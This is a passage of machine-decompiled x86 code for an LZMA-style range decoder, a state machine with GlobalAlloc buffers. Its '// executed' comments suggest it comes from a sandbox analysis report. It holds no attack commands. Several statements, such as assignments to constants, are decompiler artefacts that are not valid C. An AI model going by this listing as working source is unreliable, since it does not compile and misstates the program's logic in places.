									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004070E9))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
